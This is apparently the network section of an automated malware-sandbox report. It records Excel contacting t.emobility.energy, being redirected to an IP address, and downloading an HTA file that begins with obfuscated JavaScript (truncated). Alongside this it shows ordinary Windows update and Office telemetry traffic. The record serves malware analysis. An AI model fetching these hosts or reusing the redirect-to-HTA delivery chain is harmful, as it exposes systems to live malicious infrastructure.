                            Mar 24, 2025 09:33:33.085675955 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.085730076 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.086883068 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.105745077 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.105778933 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.105811119 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.105827093 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.105873108 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.105873108 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.133172989 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.133244038 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.133291960 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.133307934 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.133342028 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.133565903 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.164366961 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.164417982 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.164530039 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.164530039 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.164546967 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.164849043 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.182121992 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.182140112 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.182221889 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.182244062 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.182882071 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.201112032 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.201131105 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.201349974 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.201375008 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.201513052 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.219136953 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.219155073 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.219361067 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.219376087 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.219475031 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.245409012 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.245426893 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.245906115 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.245919943 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.246151924 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.266875029 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.266894102 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.267020941 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.267021894 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.267038107 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.267236948 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.288225889 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.288254976 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.288336039 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.288357019 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.288393021 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.288692951 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.307390928 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.307411909 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.307499886 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.307519913 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.307540894 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.307837963 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.322818995 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.322839022 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.322941065 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.322941065 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.322953939 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.323093891 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.352758884 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.352777958 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.352902889 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.352902889 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.352919102 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.352974892 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.369801998 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.369827032 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.369932890 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.369932890 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.369950056 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.370115042 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.395642042 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.395661116 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.395772934 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.395772934 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.395787954 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.395946026 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.413155079 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.413172960 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.413279057 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.413279057 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.413295031 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.413537979 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.427786112 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.427803993 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.427894115 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.427908897 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.428097010 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.452833891 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.452856064 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.452972889 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.452972889 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.452987909 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.453087091 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.470973969 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.470999956 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.471071959 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.471088886 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.471123934 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.471123934 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.491900921 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.491925955 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.491971970 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.491988897 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.492079020 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.509690046 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.509711981 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.509809971 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.509809971 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.509825945 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.509875059 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.526063919 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.526081085 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.526120901 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.526135921 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.526174068 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.526335955 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.548226118 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.548247099 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.548322916 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.548338890 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.548481941 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.565531969 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.565552950 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.565628052 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.565640926 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.565664053 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.565735102 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.588275909 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.588294029 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.588398933 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.588416100 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.588465929 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.588465929 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.605473042 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.605499029 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.605567932 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.605597019 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.606688976 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.621047020 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.621074915 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.621167898 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.621186018 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.621196032 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.621274948 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.724956036 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.724983931 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725045919 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725059032 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725074053 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725106001 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725106001 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725136042 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725140095 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725157976 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725172997 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725184917 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725184917 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725224018 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725251913 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725258112 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725270033 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725291967 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725313902 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725317955 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725327969 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725346088 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725380898 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725380898 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.725390911 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725471020 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.733774900 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.733793020 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.733875990 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.733889103 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.733937025 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.766953945 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.766979933 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.767071009 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.767071009 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.767088890 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.767129898 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795046091 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795069933 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795115948 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795118093 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795133114 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795154095 CET49701443192.168.2.913.107.246.40
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 24, 2025 09:33:17.831415892 CET | 59433 | 53 | 192.168.2.9 | 1.1.1.1
                            Mar 24, 2025 09:33:17.958359957 CET | 53 | 59433 | 1.1.1.1 | 192.168.2.9
                            Mar 24, 2025 09:33:31.287343979 CET | 62267 | 53 | 192.168.2.9 | 1.1.1.1
                            Mar 24, 2025 09:33:31.391124964 CET | 53 | 62267 | 1.1.1.1 | 192.168.2.9
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Mar 24, 2025 09:33:17.831415892 CET | 192.168.2.9 | 1.1.1.1 | 0xbaf7 | Standard query (0) | t.emobility.energy | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:33:31.287343979 CET | 192.168.2.9 | 1.1.1.1 | 0x2500 | Standard query (0) | otelrules.svc.static.microsoft | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Mar 24, 2025 09:32:26.507072926 CET | 1.1.1.1 | 192.168.2.9 | 0xc65a | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:32:26.507072926 CET | 1.1.1.1 | 192.168.2.9 | 0xc65a | No error (0) | s-0005.dual-s-msedge.net | | 52.123.128.14 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:26.507072926 CET | 1.1.1.1 | 192.168.2.9 | 0xc65a | No error (0) | s-0005.dual-s-msedge.net | | 52.123.129.14 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | www.download.windowsupdate.com.cdn.dnsv1.com | microsoft-10.ovslegodl.sched.ovscdns.com | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.182.96 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.175.186.85 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.136.87 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.175.170.196 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.134.210 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.175.186.87 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.183.76 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.136.170 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.183.74 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:32:27.139607906 CET | 1.1.1.1 | 192.168.2.9 | 0x460f | No error (0) | microsoft-10.ovslegodl.sched.ovscdns.com | | 43.152.135.101 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:33:17.958359957 CET | 1.1.1.1 | 192.168.2.9 | 0xbaf7 | No error (0) | t.emobility.energy | host1.emobility.energy | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:33:17.958359957 CET | 1.1.1.1 | 192.168.2.9 | 0xbaf7 | No error (0) | host1.emobility.energy | | 162.19.137.157 | A (IP address) | IN (0x0001) | false
                            Mar 24, 2025 09:33:31.391124964 CET | 1.1.1.1 | 192.168.2.9 | 0x2500 | No error (0) | otelrules.svc.static.microsoft | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:33:31.391124964 CET | 1.1.1.1 | 192.168.2.9 | 0x2500 | No error (0) | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:33:31.391124964 CET | 1.1.1.1 | 192.168.2.9 | 0x2500 | No error (0) | star-azurefd-prod.trafficmanager.net | shed.dual-low.s-part-0012.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:33:31.391124964 CET | 1.1.1.1 | 192.168.2.9 | 0x2500 | No error (0) | shed.dual-low.s-part-0012.t-0009.t-msedge.net | s-part-0012.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 24, 2025 09:33:31.391124964 CET | 1.1.1.1 | 192.168.2.9 | 0x2500 | No error (0) | s-part-0012.t-0009.t-msedge.net | | 13.107.246.40 | A (IP address) | IN (0x0001) | false
                            • t.emobility.energy
                            • otelrules.svc.static.microsoft
                            • ctldl.windowsupdate.com
                            • 217.154.55.185
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.9 | 49687 | 43.152.182.96 | 80 | 1896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            Mar 24, 2025 09:32:27.248343945 CET | 287 | OUT | GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6a8babc50d5d255e HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            If-Modified-Since: Thu, 05 Dec 2024 19:42:09 GMT
                            If-None-Match: "06cfcc54d47db1:0"
                            User-Agent: Microsoft-CryptoAPI/10.0
                            Host: ctldl.windowsupdate.com
                            Mar 24, 2025 09:32:27.350023985 CET | 303 | IN | HTTP/1.1 304 Not Modified
                            Etag: "06cfcc54d47db1:0"
                            Cache-Control: public,max-age=900
                            Content-Type: application/vnd.ms-cab-compressed
                            Date: Thu, 05 Dec 2024 22:41:48 GMT
                            X-NWS-LOG-UUID: 17436673637204598576
                            Connection: close
                            Server: Lego Server
                            X-Cache-Lookup: Cache Hit
                            X-CID: 15
                            X-CCC: US
                            Mar 24, 2025 09:32:27.407335997 CET | 1 | IN | Data Raw: 0d
                            Data Ascii:


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            1 | 192.168.2.9 | 49689 | 43.152.182.96 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Mar 24, 2025 09:32:28.575257063 CET | 196 | OUT | GET /msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?526cae6927517da1 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/10.0
                            Host: ctldl.windowsupdate.com
                            Mar 24, 2025 09:32:28.674036980 CET | 388 | IN | HTTP/1.1 200 OK
                            Last-Modified: Fri, 02 Jun 2017 17:39:05 GMT
                            Etag: "80424021c7dbd21:0"
                            Content-Type: application/vnd.ms-cab-compressed
                            Date: Thu, 20 Mar 2025 11:53:34 GMT
                            Cache-Control: public, max-age=900
                            Content-Length: 7796
                            Accept-Ranges: bytes
                            X-NWS-LOG-UUID: 598174241133232527
                            Connection: keep-alive
                            Server: Lego Server
                            X-Cache-Lookup: Cache Hit
                            X-CID: 15
                            X-CCC: US


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.9 | 49700 | 217.154.55.185 | 80 | 1896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            Mar 24, 2025 09:33:18.919820070 CET | 267 | OUT | GET /xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Connection: Keep-Alive
                            Host: 217.154.55.185
                            Mar 24, 2025 09:33:19.090862989 CET | 1254 | IN | HTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:19 GMT
                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                            Last-Modified: Mon, 24 Mar 2025 07:00:12 GMT
                            ETag: "1654-6311127d429d6"
                            Accept-Ranges: bytes
                            Content-Length: 5716
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/hta
                            Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by http://www.n90dns.com -->...document.write(unescape(' [TRUNCATED]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.9 | 49699 | 162.19.137.157 | 443 | 1896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-24 08:33:18 UTC | 226 | OUT | GET /3yRDYq?&balance=tested&cleaner HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: t.emobility.energy
                            Connection: Keep-Alive
                            2025-03-24 08:33:18 UTC | 621 | IN | HTTP/1.1 302 Found
                            Date: Mon, 24 Mar 2025 08:33:18 GMT
                            Server: Apache/2.4.62 (Debian)
                            X-DNS-Prefetch-Control: off
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                            X-Download-Options: noopen
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            Location: http://217.154.55.185/xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid
                            Vary: Accept
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 119
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                            Connection: close
                            2025-03-24 08:33:18 UTC | 119 | IN | Data Ascii: Found. Redirecting to http://217.154.55.185/xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.9 | 49701 | 13.107.246.40 | 443 | 1896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-24 08:33:31 UTC | 226 | OUT | GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-24 08:33:32 UTC | 500 | IN | HTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:31 GMT
                            Content-Type: text/plain
                            Content-Length: 1114783
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public
                            Last-Modified: Sat, 22 Mar 2025 04:56:33 GMT
                            ETag: "0x8DD68FDEB406397"
                            x-ms-request-id: 1e99e20f-501e-005b-7c62-9cd7f7000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250324T083331Z-17cccd5449bmwjbphC1EWRnfmw000000053g000000004aer
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L2_T2
                            X-Cache: TCP_REMOTE_HIT
                            Accept-Ranges: bytes
                            2025-03-24 08:33:32 UTC15884INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
